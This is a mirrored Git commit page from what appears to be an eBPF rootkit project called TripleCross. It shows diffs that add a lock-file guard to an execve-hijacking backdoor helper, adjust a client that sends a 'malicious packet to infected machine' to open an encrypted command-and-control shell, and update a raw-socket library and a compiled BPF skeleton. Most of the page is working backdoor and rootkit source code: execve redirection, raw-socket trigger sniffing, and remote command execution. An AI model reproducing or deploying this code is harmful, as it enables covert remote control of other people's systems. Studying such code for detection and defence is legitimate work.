admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-16 23:33:06 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added locking mechanism for execve_hijack. Incorporated new library rawtcp with latest version without bug.

Browse Source
This commit is contained in:
h3xduck
2022-04-14 13:24:43 -04:00
parent a9f0ae17f7
commit 8be536fb6f
11 changed files with 36 additions and 20 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

12
src/.output/kit.skel.h
View File

@@ -1695,8 +1695,8 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
\x0c\0\0\x0d\x70\0\0\x90\x02\0\0\x50\x0c\0\0\x8a\x0c\0\0\x0d\x70\0\0\x98\x02\0\ \x0c\0\0\x0d\x70\0\0\x90\x02\0\0\x50\x0c\0\0\x8a\x0c\0\0\x0d\x70\0\0\x98\x02\0\
\0\x50\x0c\0\0\x8a\x0c\0\0\x0d\x70\0\0\xa8\x02\0\0\xe8\x02\0\0\0\0\0\0\0\0\0\0\ \0\x50\x0c\0\0\x8a\x0c\0\0\x0d\x70\0\0\xa8\x02\0\0\xe8\x02\0\0\0\0\0\0\0\0\0\0\
\xf8\x02\0\0\xe8\x02\0\0\xc1\x07\0\0\x01\x0c\x04\0\xe0\x0c\0\0\x69\0\0\0\0\0\0\ \xf8\x02\0\0\xe8\x02\0\0\xc1\x07\0\0\x01\x0c\x04\0\xe0\x0c\0\0\x69\0\0\0\0\0\0\
\0\xfd\x0c\0\0\x2b\x0d\0\0\0\x90\x03\0\x08\0\0\0\xfd\x0c\0\0\x89\x03\0\0\x16\ \0\xfd\x0c\0\0\x2b\x0d\0\0\0\x98\x03\0\x08\0\0\0\xfd\x0c\0\0\x89\x03\0\0\x16\
\x94\x03\0\x18\0\0\0\xfd\x0c\0\0\x67\x0d\0\0\x08\x64\x01\0\x30\0\0\0\xfd\x0c\0\ \x9c\x03\0\x18\0\0\0\xfd\x0c\0\0\x67\x0d\0\0\x08\x64\x01\0\x30\0\0\0\xfd\x0c\0\
\0\x67\x0d\0\0\x08\x64\x01\0\x38\0\0\0\xfd\x0c\0\0\x84\x0d\0\0\x05\x70\x01\0\ \0\x67\x0d\0\0\x08\x64\x01\0\x38\0\0\0\xfd\x0c\0\0\x84\x0d\0\0\x05\x70\x01\0\
\x60\0\0\0\xfd\x0c\0\0\xb2\x0d\0\0\x0b\x78\x01\0\xc0\0\0\0\xfd\x0c\0\0\xe1\x0d\ \x60\0\0\0\xfd\x0c\0\0\xb2\x0d\0\0\x0b\x78\x01\0\xc0\0\0\0\xfd\x0c\0\0\xe1\x0d\
\0\0\x0a\x80\x01\0\x10\x01\0\0\xfd\x0c\0\0\x0b\x0e\0\0\x12\x84\x01\0\x18\x01\0\ \0\0\x0a\x80\x01\0\x10\x01\0\0\xfd\x0c\0\0\x0b\x0e\0\0\x12\x84\x01\0\x18\x01\0\
@@ -1749,9 +1749,9 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
\x08\x08\x03\0\x88\x09\0\0\xfd\x0c\0\0\x1d\x16\0\0\x09\x0c\x03\0\xa8\x09\0\0\ \x08\x08\x03\0\x88\x09\0\0\xfd\x0c\0\0\x1d\x16\0\0\x09\x0c\x03\0\xa8\x09\0\0\
\xfd\x0c\0\0\x44\x16\0\0\x3c\x14\x03\0\xc0\x09\0\0\xfd\x0c\0\0\x44\x16\0\0\x08\ \xfd\x0c\0\0\x44\x16\0\0\x3c\x14\x03\0\xc0\x09\0\0\xfd\x0c\0\0\x44\x16\0\0\x08\
\x14\x03\0\xd0\x09\0\0\xfd\x0c\0\0\x44\x16\0\0\x08\x14\x03\0\xd8\x09\0\0\xfd\ \x14\x03\0\xd0\x09\0\0\xfd\x0c\0\0\x44\x16\0\0\x08\x14\x03\0\xd8\x09\0\0\xfd\
\x0c\0\0\x75\x0e\0\0\x09\x18\x03\0\0\x0a\0\0\xfd\x0c\0\0\x89\x16\0\0\x05\x24\ \x0c\0\0\x75\x0e\0\0\x09\x18\x03\0\0\x0a\0\0\xfd\x0c\0\0\x89\x16\0\0\x05\x2c\
\x03\0\x28\x0a\0\0\xfd\x0c\0\0\xc4\x16\0\0\x05\x28\x03\0\x50\x0a\0\0\xfd\x0c\0\ \x03\0\x28\x0a\0\0\xfd\x0c\0\0\xc4\x16\0\0\x05\x30\x03\0\x50\x0a\0\0\xfd\x0c\0\
\0\xf5\x16\0\0\x05\x2c\x03\0\x78\x0a\0\0\xfd\x0c\0\0\x24\x17\0\0\x05\x30\x03\0\ \0\xf5\x16\0\0\x05\x34\x03\0\x78\x0a\0\0\xfd\x0c\0\0\x24\x17\0\0\x05\x38\x03\0\
\xb8\x0a\0\0\xfd\x0c\0\0\0\0\0\0\0\0\0\0\xc0\x0a\0\0\xfd\x0c\0\0\x53\x17\0\0\ \xb8\x0a\0\0\xfd\x0c\0\0\0\0\0\0\0\0\0\0\xc0\x0a\0\0\xfd\x0c\0\0\x53\x17\0\0\
\x08\x18\x01\0\xd8\x0a\0\0\xfd\x0c\0\0\x53\x17\0\0\x08\x18\x01\0\xe0\x0a\0\0\ \x08\x18\x01\0\xd8\x0a\0\0\xfd\x0c\0\0\x53\x17\0\0\x08\x18\x01\0\xe0\x0a\0\0\
\xfd\x0c\0\0\x8f\x11\0\0\x09\x1c\x01\0\x18\x0b\0\0\xfd\x0c\0\0\x83\x17\0\0\x08\ \xfd\x0c\0\0\x8f\x11\0\0\x09\x1c\x01\0\x18\x0b\0\0\xfd\x0c\0\0\x83\x17\0\0\x08\
@@ -1761,7 +1761,7 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
\0\xc0\x17\0\0\x09\x34\x01\0\x88\x0b\0\0\xfd\x0c\0\0\x0e\x18\0\0\x27\x48\x01\0\ \0\xc0\x17\0\0\x09\x34\x01\0\x88\x0b\0\0\xfd\x0c\0\0\x0e\x18\0\0\x27\x48\x01\0\
\xa0\x0b\0\0\xfd\x0c\0\0\x0e\x18\0\0\x05\x48\x01\0\xb8\x0b\0\0\xfd\x0c\0\0\xbd\ \xa0\x0b\0\0\xfd\x0c\0\0\x0e\x18\0\0\x05\x48\x01\0\xb8\x0b\0\0\xfd\x0c\0\0\xbd\
\x11\0\0\x08\x80\x02\0\xc0\x0b\0\0\xfd\x0c\0\0\x58\x18\0\0\x09\x84\x02\0\xe0\ \x11\0\0\x08\x80\x02\0\xc0\x0b\0\0\xfd\x0c\0\0\x58\x18\0\0\x09\x84\x02\0\xe0\
\x0b\0\0\xfd\x0c\0\0\xc1\x07\0\0\x01\xac\x03\0\xd6\x18\0\0\x89\0\0\0\0\0\0\0\ \x0b\0\0\xfd\x0c\0\0\xc1\x07\0\0\x01\xb4\x03\0\xd6\x18\0\0\x89\0\0\0\0\0\0\0\
\xdf\x18\0\0\x04\x19\0\0\0\xd4\0\0\x08\0\0\0\xdf\x18\0\0\x2d\x19\0\0\x29\xe0\0\ \xdf\x18\0\0\x04\x19\0\0\0\xd4\0\0\x08\0\0\0\xdf\x18\0\0\x2d\x19\0\0\x29\xe0\0\
\0\x10\0\0\0\xdf\x18\0\0\x63\x19\0\0\x25\xe4\0\0\x18\0\0\0\x8d\x19\0\0\xc8\x19\ \0\x10\0\0\0\xdf\x18\0\0\x63\x19\0\0\x25\xe4\0\0\x18\0\0\0\x8d\x19\0\0\xc8\x19\
\0\0\x15\x30\0\0\x28\0\0\0\xdf\x18\0\0\x01\x1a\0\0\x08\x0c\x01\0\x30\0\0\0\xdf\ \0\0\x15\x30\0\0\x28\0\0\0\xdf\x18\0\0\x01\x1a\0\0\x08\x0c\x01\0\x30\0\0\0\xdf\

BIN
src/bin/kit
View File

Binary file not shown.

8
src/client/client.c
View File

@@ -201,7 +201,7 @@ void activate_command_control_shell_encrypted(char* argv){
char* payload = malloc(SYN_PACKET_PAYLOAD_LEN); char* payload = malloc(SYN_PACKET_PAYLOAD_LEN);
srand(time(NULL)); srand(time(NULL));
for(int ii=0; ii<SYN_PACKET_PAYLOAD_LEN; ii++){ for(int ii=0; ii<SYN_PACKET_PAYLOAD_LEN; ii++){
payload[ii] = rand(); payload[ii] = (char)rand();
} }
//Follow protocol rules //Follow protocol rules
char section[SYN_PACKET_SECTION_LEN]; char section[SYN_PACKET_SECTION_LEN];
@@ -231,9 +231,7 @@ void activate_command_control_shell_encrypted(char* argv){
strncpy(payload+0x0D, result, SYN_PACKET_SECTION_LEN); strncpy(payload+0x0D, result, SYN_PACKET_SECTION_LEN);
packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, CC_PROT_SYN);
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload //Sending the malicious payload
if(rawsocket_send(packet)<0){ if(rawsocket_send(packet)<0){
@@ -294,7 +292,7 @@ void main(int argc, char* argv[]){
char path_arg[512]; char path_arg[512];
//Command line argument parsing //Command line argument parsing
while ((opt = getopt(argc, argv, ":S:c:h:e")) != -1) { while ((opt = getopt(argc, argv, ":S:c:e:h")) != -1) {
switch (opt) { switch (opt) {
case 'S': case 'S':
print_welcome_message(); print_welcome_message();

BIN
src/client/client.o
View File

Binary file not shown.

BIN
src/client/injector
View File

Binary file not shown.

BIN
src/client/lib/libRawTCP_Lib.a
View File

Binary file not shown.

2
src/ebpf/include/bpf/exec.h
View File

@@ -198,6 +198,8 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
bpf_printk("Error reading 1\n"); bpf_printk("Error reading 1\n");
}; };
//hijacker_state = 1;
bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename); bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
bpf_printk("NEW ARGV0: %s\n\n", newargv[0]); bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
bpf_printk("NEW ARGV1: %s\n", newargv[1]); bpf_printk("NEW ARGV1: %s\n", newargv[1]);

BIN
src/helpers/execve_hijack
View File

Binary file not shown.

34
src/helpers/execve_hijack.c
View File

@@ -15,6 +15,8 @@
#include <netdb.h> #include <netdb.h>
#include <netinet/ip.h> #include <netinet/ip.h>
#include <netinet/tcp.h> #include <netinet/tcp.h>
#include <sys/file.h>
#include <errno.h>
#include "lib/RawTCP.h" #include "lib/RawTCP.h"
#include "../common/c&c.h" #include "../common/c&c.h"
@@ -22,6 +24,8 @@
#include <bpf/bpf.h> #include <bpf/bpf.h>
#include <bpf/libbpf.h> #include <bpf/libbpf.h>
#define LOCK_FILE "/tmp/rootlog"
char* getLocalIpAddress(){ char* getLocalIpAddress(){
char hostbuffer[256]; char hostbuffer[256];
char* IPbuffer = calloc(256, sizeof(char)); char* IPbuffer = calloc(256, sizeof(char));
@@ -65,13 +69,8 @@ char* execute_command(char* command){
return res; return res;
} }
int hijacker_process_routine(int argc, char* argv[]){ int hijacker_process_routine(int argc, char* argv[], int fd){
int fd = open("/tmp/rootlog", O_RDWR | O_CREAT | O_TRUNC, 0666); //Lock the file to indicate we are already into the routine
if(fd<0){
perror("Failed to open log file");
//return -1;
}
time_t rawtime; time_t rawtime;
struct tm * timeinfo; struct tm * timeinfo;
@@ -98,7 +97,7 @@ int hijacker_process_routine(int argc, char* argv[]){
write(fd, "\n", 1); write(fd, "\n", 1);
write(fd, "Sniffing...\n", 13); write(fd, "Sniffing...\n", 13);
printf("Running hijacking process\n");
packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN); packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
if(packet.ipheader == NULL){ if(packet.ipheader == NULL){
write(fd, "Failed to open rawsocket\n", 1); write(fd, "Failed to open rawsocket\n", 1);
@@ -149,6 +148,7 @@ int hijacker_process_routine(int argc, char* argv[]){
} }
} }
flock(fd, LOCK_UN);
close(fd); close(fd);
return 0; return 0;
} }
@@ -177,6 +177,7 @@ int main(int argc, char* argv[], char *envp[]){
perror("Failed to execve()"); perror("Failed to execve()");
exit(-1); exit(-1);
} }
exit(0);
} }
@@ -190,8 +191,23 @@ int main(int argc, char* argv[], char *envp[]){
if (pid == 0) { if (pid == 0) {
//Child process //Child process
printf("I am the child with pid %d\n", (int) getpid()); printf("I am the child with pid %d\n", (int) getpid());
//First of all check if the locking log file is locked, which indicates that the backdoor process is already running
int fd = open(LOCK_FILE, O_RDWR | O_CREAT | O_TRUNC, 0666);
if(fd<0){
perror("Failed to open lock file before entering hijacking routine");
exit(-1);
}
if (flock(fd, LOCK_EX|LOCK_NB) == -1) {
if (errno == EWOULDBLOCK) {
perror("lock file was locked");
} else {
perror("Error with the lockfile");
}
exit(-1);
}
hijacker_process_routine(argc, argv, fd);
printf("Child process is exiting\n"); printf("Child process is exiting\n");
hijacker_process_routine(argc, argv);
exit(0); exit(0);
} }
//Parent process. Call original hijacked command //Parent process. Call original hijacked command

BIN
src/helpers/execve_hijack.o
View File

Binary file not shown.